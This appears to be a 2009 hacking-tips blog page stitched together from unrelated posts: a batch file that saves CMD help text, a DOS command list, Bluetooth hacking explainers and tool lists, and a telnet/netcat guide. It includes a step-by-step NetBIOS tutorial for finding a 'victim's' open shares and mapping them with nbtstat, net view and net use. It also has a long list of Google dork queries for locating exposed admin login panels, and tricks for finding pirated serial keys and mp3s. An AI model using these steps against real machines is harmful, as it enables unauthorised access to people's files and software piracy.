Copy and paste the following code in notepad and save it as lecture.bat click to learn cmd commands.this will create notepads in ur D:\ drive which will contain explanation of various commands.
c:
copy/? >d:\copy.txt
dir/? >d:\dir.txt
rmdir/? >d:\rmdir.txt
format/? >d:\format.txt
diskpart/? >d:\diskpart.txt
tree/? >d:\tree.txt
telnet/? >d:\telnet.txt
time/? >d:\time.txt
net user/? >d:\netuser.txt
del/? >d:\del.txt
attrib/? >d:\attrib.txt
shutdown/? >d:\shutdown.txt
color/? >d:\color.txt
echo/? >d:\echo.txt
type/? >d:\type.txt
ipconfig/? >d:\ipconfig.txt
ipconfig/all/? >d:\ipconfigall.txt
netstat/? >d:\netstat.txt
nbstat/? >d:\nbstat.txt
netview/? >d:\netview.txt
ping/? >d:\ping.txt
chkdsk/? >d:\chkdsk.txt
ver/? >d:\ver.txt
cd/? >d:\cd.txt
net/? >d:\net.txt
fsutil/? >d:\fsutil.txt
erase/? >d:\erase.txt
tracert/? >d:\tracert.txt
bootcfg/? >d:\bootcfg.txt
driverquery/? >d:\driverquery.txt
getmac/? >d:\getmac.txt
netsh/? >d:\netsh.txt
systeminfo/? >d:\systeminfo.txt
print/? >d:\print.txt
prompt/? >d:\prompt.txt
Saturday, April 4, 2009
All Dos Commands
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders
Friday, April 3, 2009
BLUETOOTH HACKING
Bluetooth is wireless technology of data and voice. It requires very low power .It has range from 10m-100m.It can transfer upto 1Mb/s of data.
What is blue-tooth hacking ?
Blue-tooth hacking is hacking the other device without the knowing that device.It is also know as Bluesnarfing. Blue-tooth hacking not only limited to cell phones ,but it can also hacked the desktop computers ,LAP’s .
Types of hacking-
Their are types of blue-tooth hacking –
1.Bluesnarfing
2.Bluejacking
3.Bluebugging
Bluesnarfing is same as Bluetooth hacking. While Bluesnarfing is very much different from bluejacking.Bluesnarfing first introduced by Marcel Holtmann in October 2003. Example is transfer of images.
Bluejacking is harmless technology ,the personal information not exposed .In this name field is used to transfer the data.The example for is transfer of business card. Bluebugging was introduced by Martin Herfurt in March 2004.
Example of bluebugging is transfer of messages.
Problems faced by user
1.The hacker can delete or steal the contacts ,personal images etc.
2.The hacker can make the call orelse use internet at your expenses.
3.The hacker can default to factory setting to your device.
4.The hacker can clone your device so that your messages are also routed to another number. Cloning is also considered as illegal.
Method of hacking
The general method is guessing media access control or MAC address which is at application level that has 48-bit number and is unique among mobile devices .
Some of them are made for Unix platform while others can be used on Java or Symbian compatible cell phone.
As hacking is illegal then Blue-tooth hacking and Bluesnarfing are also illlegal . This arcticle is aware of Blue-tooth technology to the user.
Bluesnarfing: Type of Bluetooth Hackin
Bluesnarfing is one type of blue-tooth hacking. While it is similar to the bluejacking and bluebugging. It was discovered by Marcel Holtmann in october 2003.
Bluesnarfing is unauthorized access of information or data from wireless device through blue-toothtechnology. Connection is often between the desktop’s, LAP’s ,cellphones , PDA’s . Blue-tooth is very high speed but a short range wireless technology,in which exchanging of information between cellphones, deskstop’s. The most know device in which the blue-tooth is already installed is cellphones .
In this the attacker access the calendar, contact list and e-mail and text messages without leaving any evidence of the act. Other device is Laptop’s and computers ,they are having less frequency and more complex system than cellphones . The time required is attacking this device takes is more.
Bluesnarfing
In bluesnarfing the exchange of Information takes place by guessing the MAC address. However this is difficult task for attacker ,the Bluetooth uses a 48-bit unique MAC Address. There are over 280 trillion possible addresses to guess .After guessing ,the attacker can synchronize the device which is know as pairing . Then at least the information is exchanged between the devices.
Bluesnarfing is considered as the illegal in many countries.To avoid bluesnarfing always switch off the blue tooth device to non-discoverable mode . Never pair the device with the unknown or public places.
NetBios Hacking For Windows 98/ME/NT/XP Tutorial
Well one of the famous, easy and easy to understand type of hacking is Net Bios. You can play with it as follows.
Disclaimer: We don’t take any responsibility for Illegal use of this tutorial.
Step 1
Get a IP (range) scanner. (superscanner is a fast one, get it here).
Scan the victim’s ip on TCP/IP port 139 (More info about TCP/IP port here)
Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok
this is what you see:
c:\windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:\windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name TableName Type Status
—————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————
If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.
Step 3
type down:
c:\windows>net view \\255.255.255.255
if the output is like this:
Shared resources at \\255.255.255.255
ComputerNameGoesHere
Sharename Type Used as Comment
————————————————————
CDISK Disk xxxxx xxxxx
The command completed successfully.
“DISK” shows that the victim is sharing a Disk named as CDISK
Step 4
type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.
c:\windows>net use x: \\255.255.255.255\CDISK
If the command is successful we will get the confirmation.
The command was completed successfullly
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:\> .
Hope you have enjoyed this small hacking tutorial.
MS DOS Hacking
In this Guide you will learn how to:
* Use telnet from Windows
* Download web pages via telnet
* Get finger information via telnet
* Telnet from the DOS command-line
* Use netcat
* Break into Windows Computers from the Internet
Protecting Yourself
What can they do
The command-line approach
The GUI approach
——————————————————————
How to Use Telnet on a Windows Computer
Telnet is great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet.
If you are using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt\system32 directory. There isn’t a lot of online help concerning the usage of the program, so my goal is to provide some information for new users.
First off, telnet isn’t so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine.
Now, telnet runs on your Win95 box as a GUI application…that is to say that you can type “telnet” at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled “telnet” will open. This differs from your ftp program in that all commands are entered in the DOS window.
Let’s begin by opening telnet. Simply open a DOS window by clicking “start”, then “programs”, then “MS-DOS”, and at the command prompt, type:
c:\telnet
The window for telnet will open, and you can browse the features of the program from the menu bar.
To learn a bit more about telnet, choose Help -> Contents, or
Help -> Search for help on… from the menu bar. Read through
the files in order to find more detailed explanations of things
you may wish to do. For example, in this explanation, I will
primarily be covering how to use the application and what it can
be used for, but now how to customize the colors for the application.
Now, if you choose Connect -> Remote System, you will be presented with a dialog window that will ask you for the remote host, the port and the terminal type.
In the Connect dialog box, you can enter in the host to which
you wish to connect, and there is a list box of several ports
you can connect to:
daytime: May give you the current time on the server.
echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive nd running on the Internet. qotd: May provide you with a quote of the day.
chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program.
telnet: May present you with a login screen.
These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports…you can type in any port number you wish. (For more on fun ports, see the GTMHH, “Port Surf’s Up.”) You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service.
When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt.
[Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.]
Now, you can also use telnet to connect to other ports, such as
ftp (21), smtp (25), pop3 (110), and even http (80). When you
connect to ftp, smtp, and pop3, you will be presented with a
banner, or a line of text that displays some information about the
service. This will give you a clue as to the operating system
running on the host computer, or it may come right out and tell
you what the operating system is…for instance, AIX, Linux,
Solaris, or NT. If you successfully connect to port 80, you will
see a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection.
Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server.
How to Download Web Pages Via Telnet
To retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80. The first thing you need to do is click on Terminal -> Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -> Start Logging… and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting the
original file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad.
Now, connect the remote host, and if your connection is successful, type in:
GET / HTTP/1.0
and hit enter twice.
You should have seen a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and you will see the HTML
code for the page, just as though you had chosen the View Source
option from your web browser. You will also get some additional
information…the headers for the file will contain some information
about the server. For example:
HTTP/1.0 200 Document follows
Date: Thu, 04 Jun 1998 14:46:46 GMT
Server: NCSA/1.5.2
Last-modified: Thu, 19 Feb 1998 17:44:13 GMT
Content-type: text/html
Content-length: 3196
One particularly interesting piece of information is the server
name. This refers to the web server software that is running
and serving web pages. You may see other names in this field,
such as versions of Microsoft IIS, Purveyor, WebSite, etc.
This will give you a clue as to the underlying operating system
running on the server.
Getting Finger Information Via Telnet
By now, you’ve probably heard or read a lot about finger. It doesn’t seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn’t ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet?
The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen.
The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don’t know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as “No one logged on.” Or you may get information of all currently logged on users. It all depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as “root”, “daemon”, “ftp”, “bin”, etc.
Another neat trick to try out is something that I have seen referred to as “finger forwarding”. To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter:
Code:
user@host1.comCode:
You should see the same information! Again, this all depends upon
the configuration of the finger daemon.
Using Telnet from the Command Line
Now, if you want to show your friends that you a “real man” because “real men don’t need no stinkin’ GUIs”, well just open up a DOS window and type:
c:\>telnet
and the program will automatically attempt to connect to the host
on the designated port for you.
Using Netcat
Let me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to:
http://www.l0pht.com/~weld
NOTE: The first character of “l0pht: is the letter “l”. The second character is a zero, not an “o”.
I know that the program is supposed to run on NT, but I have
seen it run on Win95. It’s a great little program that can be used
to do some of the same things as telnet. However, there are
advantages to using netcat…for one, it’s a command-line program,
and it can be included in a batch file. In fact, you can automate
multiple calls to netcat in a batch file, saving the results to
a text file.
Before using netcat, take a look at the readme.txt file provided in
the zipped archive you downloaded. It goes over the instructions
on how to download web pages using netcat, similar to what I
described earlier using telnet.
There are two ways to go about getting finger information using
netcat. The first is in interactive mode. Simply type:
c:\>nc
If the daemon is running, you won’t get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest. For example, I typed:
c:\>edit root
and entered the username “root”, without the quotes. Then from
the command prompt, type:
c:\>nc
and the response will appear on your screen. You can save the
output to a file by adding the appropriate redirection operator
to the end of the file:
c:\>nc
to create the file nc.log, or:
c:\>nc
to append the response to the end of nc.log. NOTE: Make sure
that you use spaces between the redirection operators.
How to Break into a Windows 95 machine Connected to the Internet
Disclaimer
The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself.
There are no special tools needed to access a remote Win95 machine…everything you need is right there on your Win95 system! Two methods will be described…the command-line approach and the GUI approach.
Protecting Yourself
First, the method of protecting yourself needs to be made perfectly clear. DON’T SHARE FILES!! I can’t stress that enough. If you are a home user, and you are connecting a Win95 computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password…8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the
password to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It’s that easy.
What Can They Do?
What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what’s in that share. The share appears as another directory on the attacker’s machine, so any programs they run will be consuming their own resources…memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you’re in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed.
** The command-line approach **
Okay, now for the part that should probably be titled “How they do it”. All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type:
c:\>nbtstat -A [ip_addr]
If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like:
NetBIOS Remote Machine Name Table
Name Type Status
———————————————
NAME <00> UNIQUE Registered
DOMAIN <00> GROUP Registered
NAME <03> UNIQUE Registered
USERNAME <03> UNIQUE Registered
MAC Address = 00-00-00-00-00-00
This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes).
**Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate.
The Fix piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of “<20>”.
**Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times…every day at 2:00 am, only on Friday evenings or weekends, etc.
If you find a machine with sharing enabled, the next thing to do is type the following command:
c:\>net view \\[ip_addr]
Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command:
c:\>net use g: \\[ip_addr]\[share_name]
You will likely get a response that the command was completed successfully. If that is the case, type:
c:\>cd g:
or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc.
Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical “hacker” (I shudder at that term) methods may be used.
** The GUI approach **
After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized…don’t close it. Now, use Notepad to open this file:
c:\windows\lmhosts.sam
Read over the file, and then open create another file in Notepad, called simply “Lmhosts”, without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type:
c:\>nbtstat -R
This command reloads the cache from the Lmhosts file you just created.
Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer…the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical “hacker” (again, that term grates on me like fingernails on a chalk board, but today, it seems that it’s all folks understand) techniques may be used to break the password.
Note from Carolyn Meinel: Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in.
First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command “netstat -r”. Something like this should show up:
C:\WINDOWS>netstat -r
Route Table
Active Routes:
Network Address Netmask Gateway Address Interface Metric
0.0.0.0 0.0.0.0 198.999.176.84 198.999.176.84 1
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
198.999.176.0 255.255.255.0 198.999.176.84 198.999.176.84 1
198.999.176.84 255.255.255.255 127.0.0.1 127.0.0.1 1
198.999.176.255 255.255.255.255 198.999.176.84 198.999.176.84 1
224.0.0.0 224.0.0.0 198.999.176.84 198.999.176.84 1
255.255.255.255 255.255.255.255 198.999.176.84 0.0.0.0 1
Your friend’s IP address should be under “Gateway Address.” Ignore the 127.0.0.1 as this will show up for everyone and simply means “locahost” or “my own computer.” If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend’s computer.
Evil Genius tip: Here is something really scary. In your shell account give the “netstat” command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world — everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP!
Use Gooogle to Find Serial Keys
intitle:”remote assessment” OpenAanval Console
intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”
“IMail Server Web Messaging” intitle:login
“Login - Sun Cobalt RaQ”
“Login to Usermin” inurl:20000
“Microsoft CRM : Unsupported Browser Version”
“OPENSRS Domain Management” inurl:manage.cgi
“please log in”
“powered by CuteNews *.* © * CutePHP
“SysCP - login”
“ttawlogin.cgi/?action=”
“VHCS Pro ver” -demo
“VNC Desktop” inurl:5800
“Web Control Panel” “Enter your password here”
“WebExplorer Server - Login” “Welcome to WebExplorer Server”
“WebSTAR Mail - Please Log In”
(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allinurl:”exchange/logon.asp”
ASP.login_aspx “ASP.NET_SessionId”
CGI:IRC Login
ez Publish administration
filetype:php inurl:”webeditor.php”
filetype:pl “Download: SuSE Linux Openexchange Server CA”
filetype:r2w r2w
intext:”"BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”
intext:”Mail admins login here to administrate your domain.”
intext:”Storage Management Server for” intitle:”Server Administration”
intitle:”Athens Authentication Point”
intitle:”ColdFusion Administrator Login”
intitle:”Dell Remote Access Controller”
intitle:”ePowerSwitch Login”
intitle:”Icecast Administration Admin Page”
intitle:”ISPMan : Unauthorized Access prohibited”
intitle:”ITS System Information” “Please log on to the SAP System”
intitle:”Login - powered by Easy File Sharing Web Server”
intitle:”MailMan Login”
intitle:”microsoft certificate services” inurl:certsrv
intitle:”MikroTik RouterOS Managing Webpage”
intitle:”MX Control Console” “If you can’t remember”
intitle:”Novell Web Services” intext:”Select a service and a language.”
intitle:”oMail-admin Administration - Login” -inurl:omnis.ch
intitle:”Philex 0.2*” -script -site:freelists.org
intitle:”PHP Advanced Transfer” inurl:”login.php”
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”please login” “your password is *”
intitle:”Remote Desktop Web Connection” inurl:tsweb
intitle:”teamspeak server-administration
intitle:”Tomcat Server Administration”
intitle:”TUTOS Login”
intitle:”vhost” intext:”vHost . 2000-2004″
intitle:”Virtual Server Administration System”
intitle:”VitalQIP IP Management System”
intitle:”VNC viewer for Java”
intitle:”WebLogic Server” intitle:”Console Login” inurl:console
intitle:”Welcome Site/User Administrator” “Please select the language” -demos
intitle:”welcome to netware *” -site:novell.com
intitle:”ZyXEL Prestige Router” “Enter password”
intitle:Group-Office “Enter your username and password to login”
intitle:Login * Webmailer
intitle:Login intext:”RT is © Copyright”
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”
intitle:plesk inurl:login.php3
inurl:”1220/parse_xml.cgi?”
inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)
inurl:”:10000″ intext:webmin
inurl:”Activex/default.htm” “Demo”
inurl:”calendar.asp?action=login”
inurl:”gs/adminlogin.aspx”
inurl:”typo3/index.php?u=” -demo
inurl:”usysinfo?login=true”
inurl:”utilities/TreeView.asp”
inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 “Oracle Enterprise Manager”
inurl:administrator “welcome to mambo”
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:default.asp intitle:”WebCommander”
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php “SquirrelMail version”
inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:”postfix admin” ext:php
inurl:search/admin.php
Login (”Powered by Jetbox One CMS ª” | “Powered by Jetstream © *”)
Novell NetWare intext:”netware management portal version”
Outlook Web Access (a better way)
pcANYWHERE EXPRESS Java Client
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Powered by INDEXU
Ultima Online loginservers
url:”webadmin” filetype:nsf
W-Nailer Upload Area
Use Gooogle to Find Serial Keys
let’s pretend you need a serial number for windows xp pro.
in the search bar type in just like this - “Windows XP Professional” 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of ‘fake’ porn sites that trick you.
or if you want to find the serial for winzip 8.1 - “Winzip 8.1″ 94FBR
just try it out, it’s very quick and it works nicely….
Here is another trick that works fairly decent for finding mp3’s on the web (which is hard to do normally, to say the least)
say you want to get, for example, a Garth Brooks song. type this in the search bar - “index of/” “garth brooks” .mp3 the ones you want to check out first are the ones that say “Index of/” in the title of the search result. this technique allows you to easily pull up web folders with direct downloads. it will look the same as if you were logging into a ftp url.. i’m sure you can be pretty flexible on how you type that in, so long as you include “index of/”
i’m sure you can use this for more than just mp3’s (it’s not perfect but it has worked for me on a few occasions)
always make sure to use the quotations where i placed them. they help pinpoint the correct search results more accurately. just try it out, also if you want to learn how to do more with google look up “google hacks”
Bluetooth Hacking Tools Part - I
There are some tools essential for bluetooth hacking purpose:
1. BlueScanner: In this the tool hacker searches for bluetooth enable device. After that it will try to extract as much information as possible for each newly discovered device .
2. BlueSniff: Blue Sniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.
3. BlueBugger: The buggers exploit the vulnerability of the device. The bluebugger is set for the bluetooth security holes found in some bluetooth- enabled device. They can access the images, phone-book , messages and other personal information.
4. Bluesnarfer: Bluesnarfing is a serious problem which is discovered in several Bluetooth-enabled mobile phones. If a Bluetooth of an device is switch on, then it is possible to connect to the phone without alerting the owner, and gain to access to restricted portions of the stored data .
5. BlueDiving: Bluediving is a Bluetooth penetration testing. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack. While also has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, L2CAP ,packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode .
6. Transient Bluetooth Environment Auditor : T-BEAR is a security-auditing platform for the Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and also various cracking tools.
Their also some more hacking tools such as the BTBrowser, BTCrawler,
Can I hack With Bluetooth (CIHWB), BTcrack, BlueTest, BTAudit.
Subscribe to:
Posts (Atom)
